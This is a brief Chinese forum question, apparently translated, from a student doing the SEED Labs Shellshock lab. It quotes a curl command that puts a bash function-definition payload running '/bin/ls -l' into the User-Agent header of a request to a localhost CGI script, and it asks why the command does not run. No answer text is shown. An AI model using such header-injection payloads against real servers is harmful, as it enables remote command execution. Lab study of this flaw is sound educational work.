0

我尝试解决种子实验室外壳冲击漏洞实验室,我通过以下命令设置代理字段 Curl -A "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l " http: //localhost/cgi-bin/sample.cgi

输出仍然是放置在 cgi 脚本中的 hello 词

我通过检查环境变量来测试代理字段。它被设置为我的命令但没有执行?关于为什么 bash 没有解析这个功能的任何建议提前谢谢

4

1 回答 1

0
于 2017-12-06T21:41:03.800 回答